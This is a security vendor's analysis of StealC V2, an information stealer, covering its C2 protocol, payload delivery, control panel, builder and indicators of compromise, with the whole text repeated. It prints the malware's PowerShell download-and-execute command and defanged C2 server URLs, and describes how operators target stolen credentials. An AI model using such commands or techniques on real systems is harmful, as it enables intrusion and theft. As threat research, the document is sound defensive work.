I StealC You: Tracking the Rapid Changes To StealC ThreatLabz (Zscaler)

IntroductionStealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption (in the latest variants). The malware’s payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts. A redesigned control panel provides an integrated builder that enables threat actors to customize payload delivery rules based on geolocation, hardware IDs (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing for credentials.This blog post focuses on the recent changes in StealC V2, describing the improvements in payload delivery, encryption, control panel functionality, and the updated communication protocol.Key TakeawaysStealC V2, introduced in March 2025, utilizes a JSON-based network protocol with RC4 encryption implemented in recent variants.StealC V2 now supports loader options that can deliver Microsoft Software Installer (MSI) packages, and PowerShell scripts.The redesigned control panel includes an embedded builder that allows operators to customize payload rules and bot responses based on geolocation, HWID, and installed software.StealC V2 includes multi-monitor screenshot capture and a unified file grabber that targets crypto wallets, gaming applications, instant messengers, email clients, VPNs, and browsers. In addition, StealC V2 supports server-side brute-forcing capabilities for credential harvesting.ThreatLabz has observed StealC V2 being deployed via Amadey, and conversely, it being used to distribute StealC V2.Technical AnalysisA thorough technical analysis of StealC V2 was published by another researcher. However, in the following sections, we delve into additional technical information that complements prior open source reportingSimilar to StealC V1, many StealC V2 samples are packed using Themida, a commercial code protection tool, which is designed to hinder reverse engineering. Additionally, the malware obfuscates nearly all the strings it uses during execution and employs a two-stage deobfuscation process, which was also observed in StealC V1.The following matrix shows a comparison between features available in StealC V1 and StealC V2. StealC Version 1StealC Version 2Anti-VM checksYesNoSupports specifying a custom port or using HTTPSYesNoEstablishes persistenceNoNoDownloads third-party DLLs from the C2 serverYesNoExecutes DLL payloads YesNoExecutes EXE payloadsYesYesExecutes MSI files payloadsNoYesExecutes PowerShell script payloadsNoYesCompiled for x64 architecturesNoYesUses RC4 encryption for network communicationsNoYes (implemented in 2.1.1)Decrypts stolen data server-sideNoYesSupports Chrome v20 application bound encryptionNoYesEnables victim screenshot capture with multi-monitor supportNoYesSupports unified file grabber functionalityNoYesStreamlines and improves the control panel with an integrated builderNoYesTable 1: A matrix comparing features available in StealC V1 and StealC V2.During the initial execution, StealC V2 decrypts important strings using a hardcoded RC4 key, along with an expiration date and information required for API resolution. If the current date is past the expiration date, the malware will terminate itself. The malware’s strings are stored in Base64 format and decrypted using RC4 encryption with a unique hardcoded key. Although the hardcoded keys may vary between samples, the builder integrated into the control panel does not change this RC4 key. Instead, the StealC V2 support team manages key updates for their clients as we will discuss later.StealC V2 performs several validation steps in addition to the expiration date, including ensuring no duplicate instances are running, and the system language cannot be a language spoken in the Commonwealth of Independent States (CIS). At this point, the second deobfuscation routine takes place, decoding configuration strings such as the host and URL path of the C2 server, along with additional API DLLs and function names for future use during execution.Those API functions are contained in the DLLs below:kernel32.dlladvapi32.dllgdiplus.dllcrypt32.dllgdi32.dllrstrtmgr.dllole32.dllwinhttp.dlluser32.dllshlwapi.dllshell32.dllntdll.dllnss3.dllwininet.dllNotably, unlike V1, StealC V2 does not include strings related to virtual machine environments. StealC V2 also no longer makes requests to the C2 server to download third-party DLLs that were required for information stealing functionality.New featuresStealC V1 was capable of executing EXE and DLL files. StealC V2 now supports downloading and executing payloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell scripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this functionality can be triggered either before or after the data-stealing functions. The table below describes how each payload is executed.Payload TypeExecution MethodEXE filesExecuted using the Windows API function ShellExecuteEx with up to 10 retry attempts if execution fails.MSI filesInstalled using msiexec.exe with the silent /passive parameter, allowing for minimal user interaction. The malware retries up to 10 times if installation fails.PowerShell scriptsExecutes a remote PowerShell script via the command powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString(‘[payload]’). If the execution fails, no retries are attempted.Table 2: New payload execution types supported by StealC V2.RC4 encryptionInterestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The most recent update has enabled RC4 encryption, indicating that malware is under active development.Updated network communication protocolStealC V2 utilizes standard JSON-based requests and responses for its C2 communication. The figure below illustrates the workflow of the C2 communication process. Figure 1: Shows StealC V2’s communications workflow.RequestThe C2 server accepts four operation types: create, upload_file, done, and loader. The create operation is always the first request, which registers the infection. The initial request always contains a bot ID (HWID) and the botnet ID (build), as shown in the example below.{
build: “main1”,
hwid: “A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330”,
type: “create”
}The HWID creation is based on the volume serial number from the system’s drive letter (or C: by default) and consists of 32 hexadecimal characters in a UUIDv4 format. ResponseThe response from the C2 server contains essential elements that define the malware’s behavior and operational tasks. It includes the access_token, which the malware uses for all subsequent requests, as well as flags that specify target configurations, such as browser settings for data theft, crypto plugins for search and exfiltration, and files to target (e.g., cryptocurrency wallets, Steam, Outlook). Steam and Outlook paths are hardcoded into the binary, and their data is exfiltrated if the corresponding flags are enabled.One notable feature in the C2 server’s response is the inclusion of a random parameter, which adds variability to each message. This string consists of hexadecimal characters and ranges from 10 to 15 hexadecimal lowercase characters in length (e.g., c689cbd9ecfa3cc in the example below). This random key-value pair plays a critical role for RC4 encrypted messages that ensures that each message is unique (even though the same encryption key is repeatedly used). This technique is used to avoid static signatures for the responses.An example response is shown below:{
8b31887be2030b7: “c689cbd9ecfa3cc”,
opcode: “success”,
access_token: “f066fcda843438[..]f666733c11901ae74102df”,
self_delete: 1,
take_screenshot: 1,
loader: 0,
steal_steam: 0,
steal_outlook: 1,
browsers: [],
plugins: [],
files: []
}Each response contains an opcode field that indicates the result of the request, such as success, blocked, error, or unknown, which are described in the next section.Based on the panel files, a StealC V2 server generates specific error codes when it detects malformed or unexpected requests. By comparison, a StealC V1 server responded with an empty message, a block notification, or terminated the connection. The following table outlines the StealC V2 error codes and the conditions under which they are triggered.RequestExplanationResponseAny requestMalformed message (not JSON compliant){“opcode”: “error”, “code”: “1000”}Any requestUnknown packet (unknown type parameter){“opcode”: “unknown”}Any requestEmpty parameter or not present{“opcode”: “error”}Any requestUnencrypted message (after version 2.0.1){“opcode”: “block”}upload_file request, done request, loader requestEmpty access token{“opcode”: “error5”}upload_file requestFilename or data parameters not present{“opcode”: “error4”}upload_file request, done request, loader requestMalformed or unknown access token{“opcode”: “error1”}upload_file requestFile was already sent by the bot{“opcode”: “error3”}upload_file requestServer couldn’t store file{“opcode”: “error2”}create requestEmpty parameter or not present{“opcode”: “error”}create requestAlready finished communication process or blocked IP{“opcode”: “blocked”}create requestUnable to register bot{“opcode”: “error”}Table 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.Control panel and builderThreatLabz analyzed a StealC V2 C2 panel with an embedded builder as shown in the figure below.Figure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.ThreatLabz’s in-depth analysis of StealC V2’s infrastructure revealed several key findings:Version control enforcement: The builder requires a version update that is provided in a ZIP archive to be uploaded via the framework’s admin settings. This ensures that operators cannot install older versions than the most recently applied update.Telegram bot integration: The control panel supports Telegram bot integration for sending notifications and allows customization of message formats.Rule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot geolocation, build IDs, markers triggered, or identified software/processes during the information-gathering phase. These rules dictate how payload responses are generated.Ongoing development: The panel is rapidly evolving, with partially implemented features like Firefox plugin loading. As previously mentioned RC4 encryption for network communication was initially commented-out. The recently released update (version 2.2.0) enabled RC4 encryption for network communications.Endpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data) similar to StealC V1 but now exclusively processes upload_file commands.IP and HWID-based blocking: The panel allows operators to block communications based on IP addresses (or IP masks) and specific HWIDs. Additionally, IP addresses can be automatically blocked for the remainder of the day after completing the communication process.Fake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages. However, a researcher noticed this fake response could be used to easily detect StealC V2 servers, and newer updates reportedly patched this behavior.Basic RC4 implementation: Despite the first StealC V2 advertisement claiming to implement a custom RC4 algorithm, the RC4 implementation used is standard.The StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules, grabber rules, and markers (markers consist of wildcards that will be triggered if the content of the stolen passwords or cookies files match) for stolen data. For example, the threat actor could create a marker searching for strings containing coinbase.com in the contents of the exfiltrated password and cookies files as shown below. Figure 3: StealC V2 Marker rule which will search for coinbase.com.Then the actor can then create a loader rule that will be triggered when the marker matches. So if the victim’s files contain the marker’s search terms, the C2 will answer to the loader request with the triggered loader’s URL as shown in the figure below.Figure 4: StealC V2 loader rule creation which will trigger when the Coinbase Marker matches.These custom configurations are automatically merged with a build template file, which is a pre-configured StealC V2 binary.The builder only modifies the build parameter from the build template, leaving the build_id parameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key, C2 address, and URL path are exclusively managed by the StealC V2 development team. Note that StealC V2 currently only supports HTTP communication on port 80.UpdatesThe figure below shows the update interface in StealC V2’s control panel.Figure 5: StealC V2’s panel and builder update menu (with two updates applied).After the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC seller) and send the control panel domain, the path for network communication, and the RC4 key created at install time. After receiving these parameters, the seller creates an update containing a builder template binary configured with the parameters from the installation script. Once the operator receives the builder template, they can use the control panel to create new StealC builds.The update file is packaged as a ZIP archive containing the following components:version.json: JSON file used by the panel to identify and install the update.build.exe: StealC V2 template binary.Optional patch files: Additional files that can replace specific existing files in the panel during the update process, ensuring seamless integration of new functionality or fixes.The example below shows the contents of a version.json file. This file contains update information, which is read by the panel to identify and apply the changes included in the update.{
“version”: “2.2.4”,
“admin_update”: true,
“gate_update”: true,
“db_update”: false,
“changes”:
[
{“type”: “gate”, “description”: “Fix build block requests v2”}
]
}The table below describes fields inside the version.json file:FieldDescriptionversionThe StealC V2 bot version.admin_updateA flag that instructs the updater to apply patches to the admin structure folder.gate_updateA flag that directs the updater to apply patches to the gate structure folder.changesA list of update messages detailing modifications, displayed within the panel.db_updateIndicates updates or modifications to the panel’s database model, specifically MySQL.Table 4: Parameters present in StealC V2’s update configuration file.Comparing StealC buildsAfter examining the builder templates included in the C2 panel, we compared different versions and identified key improvements in their development. The table below highlights the evolution of StealC across versions:Template VersionUpdate FileDescription2.0.1update.stealc_updateNo obfuscation. All strings are stored in plaintext.Only a subset of API functions are resolved.No RC4 keys.Uses winhttp.dll APIs for communication.Configuration parameters are hardcoded.2.0.12.0.0.stealc_updateImplemented obfuscation.Added RC4 key to decrypt the malware’s strings.All API functions are resolved at runtime.Features a distinct structure that sets it apart from other versions.Encrypts configuration parameters using RC4.2.1.12.1.1.stealc_update Features a code structure similar to more recent samples.First version using encryption/decryption routines for network communication with a single RC4 key that is also used for decrypting the malware’s strings. 2.1.32.1.2.stealc_updateIdentical to version 2.1.1.2.2.42.0.1.stealc_updateIncludes an RC4 key for string decryption and another RC4 key for network encryption.Improved download of payloads (based on winhttp instead of wininet.dll).Added autodelete command.Table 5: Differences among the StealC V2 bot templates present in several update files.Additionally, the latest version includes a self-delete routine, triggered based on the configuration flag (self_delete) received from the C2 server, which is very similar to the routine that StealC V1 used to erase the downloaded DLLs.ConclusionStealC V2 introduces improvements, such as enhanced payload delivery, a streamlined communications protocol with encryption, and a redesigned control panel that provides more targeted information collection. StealC V2 is frequently used in conjunction with other malware families such as Amadey. ThreatLabz is continuing to track updates to StealC V2 and adding coverage to protect our customers.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to the new variant of StealC V2 at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for StealC V2.Figure 6: Zscaler sandbox report for StealC V2.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to StealC at various levels with the following threat names:Win64.PWS.StealcWin32.PWS.StealcWin64.PWS.AmadeyWin32.PWS.AmadeyIndicators Of Compromise (IOCs)0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8cPacked sample (with Themida) SHA256 (StealC V2)e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3Packed sample (with Themida) SHA256 (StealC V2)a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385Unpacked sample SHA256 (StealC V2)27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dcUnpacked sample SHA256 (StealC V2)dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4Dropped payload SHA256 (Amadey)87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062fMalware dropping StealC V2 SHA256 (Amadey) http://45.93.20[.]64/c090b39aa5004512.phpStealC V2 C2 serverhttp://45.93.20[.]28/3d15e67552d448ff.phpStealC V2 C2 serverhttp://88.214.48[.]93/ea2cb15d61cc476f.phpStealC V2 C2 server  

​[#item_full_content] [[{“value”:”IntroductionStealC is a popular information stealer and malware downloader that has been sold since January 2023. In March 2025, StealC version 2 (V2) was introduced with key updates, including a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption (in the latest variants). The malware’s payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts. A redesigned control panel provides an integrated builder that enables threat actors to customize payload delivery rules based on geolocation, hardware IDs (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing for credentials.This blog post focuses on the recent changes in StealC V2, describing the improvements in payload delivery, encryption, control panel functionality, and the updated communication protocol.Key TakeawaysStealC V2, introduced in March 2025, utilizes a JSON-based network protocol with RC4 encryption implemented in recent variants.StealC V2 now supports loader options that can deliver Microsoft Software Installer (MSI) packages, and PowerShell scripts.The redesigned control panel includes an embedded builder that allows operators to customize payload rules and bot responses based on geolocation, HWID, and installed software.StealC V2 includes multi-monitor screenshot capture and a unified file grabber that targets crypto wallets, gaming applications, instant messengers, email clients, VPNs, and browsers. In addition, StealC V2 supports server-side brute-forcing capabilities for credential harvesting.ThreatLabz has observed StealC V2 being deployed via Amadey, and conversely, it being used to distribute StealC V2.Technical AnalysisA thorough technical analysis of StealC V2 was published by another researcher. However, in the following sections, we delve into additional technical information that complements prior open source reportingSimilar to StealC V1, many StealC V2 samples are packed using Themida, a commercial code protection tool, which is designed to hinder reverse engineering. Additionally, the malware obfuscates nearly all the strings it uses during execution and employs a two-stage deobfuscation process, which was also observed in StealC V1.The following matrix shows a comparison between features available in StealC V1 and StealC V2. StealC Version 1StealC Version 2Anti-VM checksYesNoSupports specifying a custom port or using HTTPSYesNoEstablishes persistenceNoNoDownloads third-party DLLs from the C2 serverYesNoExecutes DLL payloads YesNoExecutes EXE payloadsYesYesExecutes MSI files payloadsNoYesExecutes PowerShell script payloadsNoYesCompiled for x64 architecturesNoYesUses RC4 encryption for network communicationsNoYes (implemented in 2.1.1)Decrypts stolen data server-sideNoYesSupports Chrome v20 application bound encryptionNoYesEnables victim screenshot capture with multi-monitor supportNoYesSupports unified file grabber functionalityNoYesStreamlines and improves the control panel with an integrated builderNoYesTable 1: A matrix comparing features available in StealC V1 and StealC V2.During the initial execution, StealC V2 decrypts important strings using a hardcoded RC4 key, along with an expiration date and information required for API resolution. If the current date is past the expiration date, the malware will terminate itself. The malware’s strings are stored in Base64 format and decrypted using RC4 encryption with a unique hardcoded key. Although the hardcoded keys may vary between samples, the builder integrated into the control panel does not change this RC4 key. Instead, the StealC V2 support team manages key updates for their clients as we will discuss later.StealC V2 performs several validation steps in addition to the expiration date, including ensuring no duplicate instances are running, and the system language cannot be a language spoken in the Commonwealth of Independent States (CIS). At this point, the second deobfuscation routine takes place, decoding configuration strings such as the host and URL path of the C2 server, along with additional API DLLs and function names for future use during execution.Those API functions are contained in the DLLs below:kernel32.dlladvapi32.dllgdiplus.dllcrypt32.dllgdi32.dllrstrtmgr.dllole32.dllwinhttp.dlluser32.dllshlwapi.dllshell32.dllntdll.dllnss3.dllwininet.dllNotably, unlike V1, StealC V2 does not include strings related to virtual machine environments. StealC V2 also no longer makes requests to the C2 server to download third-party DLLs that were required for information stealing functionality.New featuresStealC V1 was capable of executing EXE and DLL files. StealC V2 now supports downloading and executing payloads in three formats: executable (EXE) files, Microsoft Software Installer (MSI) packages, and PowerShell scripts. Depending on the loader configuration parameter provided by the C2 server in the initial response, this functionality can be triggered either before or after the data-stealing functions. The table below describes how each payload is executed.Payload TypeExecution MethodEXE filesExecuted using the Windows API function ShellExecuteEx with up to 10 retry attempts if execution fails.MSI filesInstalled using msiexec.exe with the silent /passive parameter, allowing for minimal user interaction. The malware retries up to 10 times if installation fails.PowerShell scriptsExecutes a remote PowerShell script via the command powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString(‘[payload]’). If the execution fails, no retries are attempted.Table 2: New payload execution types supported by StealC V2.RC4 encryptionInterestingly, the RC4 encryption functionality was initially commented out in early versions of StealC V2. The most recent update has enabled RC4 encryption, indicating that malware is under active development.Updated network communication protocolStealC V2 utilizes standard JSON-based requests and responses for its C2 communication. The figure below illustrates the workflow of the C2 communication process. Figure 1: Shows StealC V2’s communications workflow.RequestThe C2 server accepts four operation types: create, upload_file, done, and loader. The create operation is always the first request, which registers the infection. The initial request always contains a bot ID (HWID) and the botnet ID (build), as shown in the example below.{
build: “main1”,
hwid: “A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330”,
type: “create”
}The HWID creation is based on the volume serial number from the system’s drive letter (or C: by default) and consists of 32 hexadecimal characters in a UUIDv4 format. ResponseThe response from the C2 server contains essential elements that define the malware’s behavior and operational tasks. It includes the access_token, which the malware uses for all subsequent requests, as well as flags that specify target configurations, such as browser settings for data theft, crypto plugins for search and exfiltration, and files to target (e.g., cryptocurrency wallets, Steam, Outlook). Steam and Outlook paths are hardcoded into the binary, and their data is exfiltrated if the corresponding flags are enabled.One notable feature in the C2 server’s response is the inclusion of a random parameter, which adds variability to each message. This string consists of hexadecimal characters and ranges from 10 to 15 hexadecimal lowercase characters in length (e.g., c689cbd9ecfa3cc in the example below). This random key-value pair plays a critical role for RC4 encrypted messages that ensures that each message is unique (even though the same encryption key is repeatedly used). This technique is used to avoid static signatures for the responses.An example response is shown below:{
8b31887be2030b7: “c689cbd9ecfa3cc”,
opcode: “success”,
access_token: “f066fcda843438[..]f666733c11901ae74102df”,
self_delete: 1,
take_screenshot: 1,
loader: 0,
steal_steam: 0,
steal_outlook: 1,
browsers: [],
plugins: [],
files: []
}Each response contains an opcode field that indicates the result of the request, such as success, blocked, error, or unknown, which are described in the next section.Based on the panel files, a StealC V2 server generates specific error codes when it detects malformed or unexpected requests. By comparison, a StealC V1 server responded with an empty message, a block notification, or terminated the connection. The following table outlines the StealC V2 error codes and the conditions under which they are triggered.RequestExplanationResponseAny requestMalformed message (not JSON compliant){“opcode”: “error”, “code”: “1000”}Any requestUnknown packet (unknown type parameter){“opcode”: “unknown”}Any requestEmpty parameter or not present{“opcode”: “error”}Any requestUnencrypted message (after version 2.0.1){“opcode”: “block”}upload_file request, done request, loader requestEmpty access token{“opcode”: “error5”}upload_file requestFilename or data parameters not present{“opcode”: “error4”}upload_file request, done request, loader requestMalformed or unknown access token{“opcode”: “error1”}upload_file requestFile was already sent by the bot{“opcode”: “error3”}upload_file requestServer couldn’t store file{“opcode”: “error2”}create requestEmpty parameter or not present{“opcode”: “error”}create requestAlready finished communication process or blocked IP{“opcode”: “blocked”}create requestUnable to register bot{“opcode”: “error”}Table 3: Error codes sent by the StealC V2 C2 server when an unexpected or malformed request is received.Control panel and builderThreatLabz analyzed a StealC V2 C2 panel with an embedded builder as shown in the figure below.Figure 2: The StealC V2 control panel dashboard provides a summary of infection activity and stolen information.ThreatLabz’s in-depth analysis of StealC V2’s infrastructure revealed several key findings:Version control enforcement: The builder requires a version update that is provided in a ZIP archive to be uploaded via the framework’s admin settings. This ensures that operators cannot install older versions than the most recently applied update.Telegram bot integration: The control panel supports Telegram bot integration for sending notifications and allows customization of message formats.Rule-based payload delivery: Payload delivery depends on rules created by the operator, such as bot geolocation, build IDs, markers triggered, or identified software/processes during the information-gathering phase. These rules dictate how payload responses are generated.Ongoing development: The panel is rapidly evolving, with partially implemented features like Firefox plugin loading. As previously mentioned RC4 encryption for network communication was initially commented-out. The recently released update (version 2.2.0) enabled RC4 encryption for network communications.Endpoint file handling: The control panel endpoint supports file-based uploads (e.g., multipart/form-data) similar to StealC V1 but now exclusively processes upload_file commands.IP and HWID-based blocking: The panel allows operators to block communications based on IP addresses (or IP masks) and specific HWIDs. Additionally, IP addresses can be automatically blocked for the remainder of the day after completing the communication process.Fake 404 error for C2 discovery evasion: Early versions of the panel served fake 404 Not Found pages. However, a researcher noticed this fake response could be used to easily detect StealC V2 servers, and newer updates reportedly patched this behavior.Basic RC4 implementation: Despite the first StealC V2 advertisement claiming to implement a custom RC4 algorithm, the RC4 implementation used is standard.The StealC V2 builder is embedded into the control panel interface, enabling operators to define loader rules, grabber rules, and markers (markers consist of wildcards that will be triggered if the content of the stolen passwords or cookies files match) for stolen data. For example, the threat actor could create a marker searching for strings containing coinbase.com in the contents of the exfiltrated password and cookies files as shown below. Figure 3: StealC V2 Marker rule which will search for coinbase.com.Then the actor can then create a loader rule that will be triggered when the marker matches. So if the victim’s files contain the marker’s search terms, the C2 will answer to the loader request with the triggered loader’s URL as shown in the figure below.Figure 4: StealC V2 loader rule creation which will trigger when the Coinbase Marker matches.These custom configurations are automatically merged with a build template file, which is a pre-configured StealC V2 binary.The builder only modifies the build parameter from the build template, leaving the build_id parameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key, C2 address, and URL path are exclusively managed by the StealC V2 development team. Note that StealC V2 currently only supports HTTP communication on port 80.UpdatesThe figure below shows the update interface in StealC V2’s control panel.Figure 5: StealC V2’s panel and builder update menu (with two updates applied).After the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC seller) and send the control panel domain, the path for network communication, and the RC4 key created at install time. After receiving these parameters, the seller creates an update containing a builder template binary configured with the parameters from the installation script. Once the operator receives the builder template, they can use the control panel to create new StealC builds.The update file is packaged as a ZIP archive containing the following components:version.json: JSON file used by the panel to identify and install the update.build.exe: StealC V2 template binary.Optional patch files: Additional files that can replace specific existing files in the panel during the update process, ensuring seamless integration of new functionality or fixes.The example below shows the contents of a version.json file. This file contains update information, which is read by the panel to identify and apply the changes included in the update.{
“version”: “2.2.4”,
“admin_update”: true,
“gate_update”: true,
“db_update”: false,
“changes”:
[
{“type”: “gate”, “description”: “Fix build block requests v2”}
]
}The table below describes fields inside the version.json file:FieldDescriptionversionThe StealC V2 bot version.admin_updateA flag that instructs the updater to apply patches to the admin structure folder.gate_updateA flag that directs the updater to apply patches to the gate structure folder.changesA list of update messages detailing modifications, displayed within the panel.db_updateIndicates updates or modifications to the panel’s database model, specifically MySQL.Table 4: Parameters present in StealC V2’s update configuration file.Comparing StealC buildsAfter examining the builder templates included in the C2 panel, we compared different versions and identified key improvements in their development. The table below highlights the evolution of StealC across versions:Template VersionUpdate FileDescription2.0.1update.stealc_updateNo obfuscation. All strings are stored in plaintext.Only a subset of API functions are resolved.No RC4 keys.Uses winhttp.dll APIs for communication.Configuration parameters are hardcoded.2.0.12.0.0.stealc_updateImplemented obfuscation.Added RC4 key to decrypt the malware’s strings.All API functions are resolved at runtime.Features a distinct structure that sets it apart from other versions.Encrypts configuration parameters using RC4.2.1.12.1.1.stealc_update Features a code structure similar to more recent samples.First version using encryption/decryption routines for network communication with a single RC4 key that is also used for decrypting the malware’s strings. 2.1.32.1.2.stealc_updateIdentical to version 2.1.1.2.2.42.0.1.stealc_updateIncludes an RC4 key for string decryption and another RC4 key for network encryption.Improved download of payloads (based on winhttp instead of wininet.dll).Added autodelete command.Table 5: Differences among the StealC V2 bot templates present in several update files.Additionally, the latest version includes a self-delete routine, triggered based on the configuration flag (self_delete) received from the C2 server, which is very similar to the routine that StealC V1 used to erase the downloaded DLLs.ConclusionStealC V2 introduces improvements, such as enhanced payload delivery, a streamlined communications protocol with encryption, and a redesigned control panel that provides more targeted information collection. StealC V2 is frequently used in conjunction with other malware families such as Amadey. ThreatLabz is continuing to track updates to StealC V2 and adding coverage to protect our customers.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to the new variant of StealC V2 at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for StealC V2.Figure 6: Zscaler sandbox report for StealC V2.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to StealC at various levels with the following threat names:Win64.PWS.StealcWin32.PWS.StealcWin64.PWS.AmadeyWin32.PWS.AmadeyIndicators Of Compromise (IOCs)0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8cPacked sample (with Themida) SHA256 (StealC V2)e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3Packed sample (with Themida) SHA256 (StealC V2)a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385Unpacked sample SHA256 (StealC V2)27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dcUnpacked sample SHA256 (StealC V2)dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4Dropped payload SHA256 (Amadey)87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062fMalware dropping StealC V2 SHA256 (Amadey) http://45.93.20[.]64/c090b39aa5004512.phpStealC V2 C2 serverhttp://45.93.20[.]28/3d15e67552d448ff.phpStealC V2 C2 serverhttp://88.214.48[.]93/ea2cb15d61cc476f.phpStealC V2 C2 server”}]]